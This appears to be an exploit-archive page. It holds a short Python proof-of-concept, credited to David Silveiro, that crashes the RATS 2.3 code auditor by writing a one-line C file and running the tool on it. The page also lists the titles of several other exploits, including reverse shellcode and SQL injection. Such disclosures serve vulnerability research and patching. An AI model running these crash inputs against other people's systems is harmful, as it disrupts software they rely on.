
9 new exploits Linux x86 Reverse TCP Shellcode (ipv6) Observium 0.16.7533 - Cross Site Request Forgery Observium 0.16.7533 - Authenticated Arbitrary Command Execution Merit Lilin IP Cameras - Multiple Vulnerabilities Rough Auditing Tool for Security (RATS) 2.3 - Array Out of Block Crash Wireshark - dissect_2008_16_security_4 Stack-Based Buffer Overflow Wireshark - alloc_address_wmem Assertion Failure Wireshark - ett_zbee_zcl_pwr_prof_enphases Static Out-of-Bounds Read GLPi 0.90.2 - SQL Injection
38 lines
901 B
Python
Executable file
38 lines
901 B
Python
Executable file
# Exploit Title: RATS 2.3 Array Out of Block Crash
|
|
# Date: 29th April 2016
|
|
# Exploit Author: David Silveiro
|
|
# Author Contact: twitter.com/david_silveiro
|
|
# Website: Xino.co.uk
|
|
# Software Link: https://code.google.com/archive/p/rough-auditing-tool-for-security/downloads
|
|
# Version: RATS 2.3
|
|
# Tested on: Ubuntu 14.04 LTS
|
|
# CVE : 0 day
|
|
|
|
from os import system
|
|
|
|
|
|
def crash():
|
|
|
|
|
|
with open('crash.c', 'w') as file:
|
|
file.write("char g [MAX_SIZE];") # Out of Block array, causes crash
|
|
|
|
try:
|
|
com = ('rats -w3 --xml crash.c')
|
|
return system(com)
|
|
|
|
except:
|
|
print("Is RATS installed?")
|
|
|
|
|
|
def main():
|
|
|
|
print("Author: David Silveiro ")
|
|
print("Website: Xino.co.uk ")
|
|
print("Title: RATS 2.3 Array Out Of Block Crash \n")
|
|
|
|
crash()
|
|
|
|
|
|
if __name__ == "__main__":
|
|
main()
|